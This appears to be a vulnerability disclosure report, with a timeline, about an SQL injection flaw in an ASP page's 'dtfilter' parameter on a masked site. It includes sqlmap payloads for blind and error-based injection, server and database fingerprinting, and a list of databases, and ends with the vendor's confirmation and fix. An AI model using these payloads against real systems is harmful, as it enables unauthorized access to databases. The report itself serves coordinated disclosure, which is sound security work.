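2015-12-24: Details reported to the vendor; awaiting vendor handling
2015-12-24: Vendor confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in related fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to trainee white hats
2016-02-07: Details disclosed to the public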
Target site: http://**.**.**.**/
Injection point: http://**.**.**.**/asp/info.asp?topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@%273%27&page=&from=
The injectable parameter is dtfilter.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dtfilter (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@'3') AND 1960=1960 AND (7434=7434&page=&from=

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@'3') AND 4755=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4755=4755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8802=8802&page=&from=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database: 'synnex'
available databases [15]:
[*] CentralBid
[*] countChannel
[*] countWWW
[*] distribution
[*] EWEB
[*] Global
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] synnex
[*] tempdb
[*] VAX
[*] Vendor
The current database alone has 509 tables.
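There are really too many tables, so I will paste only some of them.
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-12-24 19:25
Thank you for the report.
2016-02-16: Fixed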